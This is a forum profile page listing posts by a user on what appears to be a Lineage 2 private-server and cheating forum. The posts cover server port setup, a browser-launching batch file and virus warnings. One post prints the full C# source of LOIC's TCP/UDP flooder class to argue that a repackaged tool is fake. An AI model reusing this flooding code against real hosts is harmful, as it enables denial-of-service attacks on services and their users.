Jump to content

Aphelion

Members
  • Posts

    137
  • Credits

  • Joined

  • Last visited

  • Feedback

    0%

Everything posted by Aphelion

  1. www.l2pride.net/forums

  2. www.l2pride.net/forums

  3. Well I got another solution for ya, I've some knowledge in batch files. 1.Right click on your desktop 2.Select New -> Text document 3.Leave the name as is, we don't care 4.Right click on the txt and edit it 5.And do this: start iexplore http://www.maxcheaters.com start chrome http://www.maxcheaters.com <start> = start, open, run <iexplore> = internet explorer. <chrome> = Google chrome. <http://www.maxcheaters.com> = the website that you wanna get redirected to. Now, what you will do is, go to each browsers folder(Located in: C:/Program Files/Internet Explorer) and try to find the .exe which opens the program. In our case, Internet explorer = iexplorer. For google chrome = chrome. so, you type: start chrome (Website link) and then you save as.. (name).bat <-- don't forget the .bat also don't save it as "text document (.txt" but as "all files" Voila! You're done! Hope I helped. :)
  4. Where do your friend stuck? In which phase? Do they pass the login form? or what?
  5. You need to open the ports of your router: 7777,2106. 7777= gameserver, 2106 = loginserver You need to edit your l2.ini and put your IP in the servadress (your homes IP, or if you have no-ip, put the no-ip one) At configs of the server: External = The ip of your home or no-ip(if u have/optional) Internal = 127.0.0.1 Hope this will solve your problem, sorry for any mistakes, as I said I've forgot some things.
  6. Read the rules of the section where you created your topic.
  7. You had shared this if you remember.. http://www.maxcheaters.com/topic/53897-sharesnowing-coloseum-all-chronicles/?hl=snow <--- Topic http://www.4shared.com/file/173202493/50b08c78/aden_colosseum_t.html <--- Download link.
  8. You can't connect or your friends? Did you change the IP of l2.ini? You need to change the servaddress to 127.0.0.1
  9. You need to open 7777 port, 2106, and one more which I can't remember.. also you need to put your IP as external IP, internal IP = local network hope my advises gonna help you cuz I don't remember anything of these configs/settings
  10. And the avatar guys.. we can't upload w/e we want anymore..
  11. I spoke with Maxtor some days ago about what he should do in order to improve the forum and make it full of life, etc. Hope he'll listen to my advice.
  12. tl;dr lol Nice job btw
  13. Because simply it's fake, probably he inserted some viruses in it, dunno and I dont care. You can't convert everything from Java/C#/C++ to vb.net. And just to be sure(if a Java/C#/C++, vb.net developer can confirm it), here is the source code of it: using System; using System.ComponentModel; using System.Net; using System.Net.Sockets; using System.Text; namespace LOIC { public class XXPFlooder { public bool IsFlooding; public int FloodCount; public string IP; public int Port; public int Protocol; public int Delay; public bool Resp; public string Data; private bool AllowRandom; public XXPFlooder(string ip, int port, int proto, int delay, bool resp, string data, bool random) { this.IP = ip; this.Port = port; this.Protocol = proto; this.Delay = delay; this.Resp = resp; this.Data = data; this.AllowRandom = random; } public void Start() { IsFlooding = true; BackgroundWorker bw = new BackgroundWorker(); bw.DoWork += new DoWorkEventHandler(bw_DoWork); bw.RunWorkerAsync(); } private void bw_DoWork(object sender, DoWorkEventArgs e) { try { byte[] buf; IPEndPoint RHost = new System.Net.IPEndPoint(System.Net.IPAddress.Parse(IP), Port); while (IsFlooding) { Socket socket = null; if (Protocol == 1) { socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); socket.NoDelay = true; try { socket.Connect(RHost); } catch { continue; } socket.Blocking = Resp; try { while (IsFlooding) { FloodCount++; buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) )); socket.Send(buf); if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1); } } catch { } } if (Protocol == 2) { socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp); socket.Blocking = Resp; try { while (IsFlooding) { FloodCount++; buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) )); socket.SendTo(buf, SocketFlags.None, RHost); if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1); } } catch { } } } } catch { } } } }
  14. http://galaxystore.gr/index.php?id_product=243&controller=product&id_lang=2
  15. This server has as a [prefix] IL but when as last post on this topic is shows [prefix] H5
  16. a friend? you know that you've hands, muscles. Don't you?
  17. make xdem l2j developer he has the skills for it, he just needs to be less negative with the others and flame a bit less. (yeah, sorry xdem, but thats the truth huehue) tho, because I know that some people will come up saying that im crazy and stuff, its just my opinion guys, dont take it wrong.
  18. I can't understand why you let people bot lol (I checked your forum, and I can see that you allow people to use 3rd party programs)
  19. Λογαριασμούς Τραπέζης Λογαριασμοί facebook, κτλπ
  20. Thanks.
  21. http://www.maxcheaters.com/topic/159967-l2jl2pride/page-26 Could you remove Zeff's post from my topic? (last post, advertising other server) Thanks.
  22. It contains 12 viruses. (And not from the good ones in order to hack something , etc)
  23. http://www.maxcheaters.com/topic/172202-top-char-in-l2pride-read-inside/?hl=l2pride quote my last post, and then do your job. :P (just to avoid scam cases, misunderstandings)
×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock